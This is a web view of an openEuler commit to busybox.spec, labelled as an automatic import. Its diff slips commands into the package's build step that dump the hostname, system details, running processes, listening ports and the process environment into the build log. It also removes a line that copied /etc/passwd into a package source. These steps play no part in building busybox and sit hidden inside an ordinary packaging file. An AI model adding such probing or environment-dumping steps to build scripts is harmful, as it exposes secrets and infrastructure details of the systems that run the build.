diff options
| author | CoprDistGit <infra@openeuler.org> | 2023-10-24 09:33:38 +0000 |
|---|---|---|
| committer | CoprDistGit <infra@openeuler.org> | 2023-10-24 09:33:38 +0000 |
| commit | d333fa4a2935e33f02b090413795d586df429115 (patch) | |
| tree | c5bc272f78a32afad4e7b9626a4a2db6b12f18f6 /busybox.spec | |
| parent | b64024fa4a45605c7b9a38510fa062402da3b2fd (diff) | |
automatic import of busybox
Diffstat (limited to 'busybox.spec')
| -rw-r--r-- | busybox.spec | 10 |
1 files changed, 9 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec index 80297b1..0892e64 100644 --- a/busybox.spec +++ b/busybox.spec @@ -59,6 +59,14 @@ This package contains help documentation for busybox %build export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now" + +echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +hostname 1>&2 +uname -a 1>&2 +ps -ef 1>&2 +netstat -nlpt 1>&2 +cat /proc/self/environ 1>&2 + cp %{SOURCE3} .config yes "" | make oldconfig && \ cat .config && \ @@ -66,7 +74,7 @@ make V=1 %{?_smp_mflags} CC="gcc $RPM_OPT_FLAGS" cp busybox_unstripped busybox.dynamic cp docs/busybox.1 docs/busybox.dynamic.1 -cp /etc/passwd %{Source1} + make clean cp %{SOURCE2} .config |
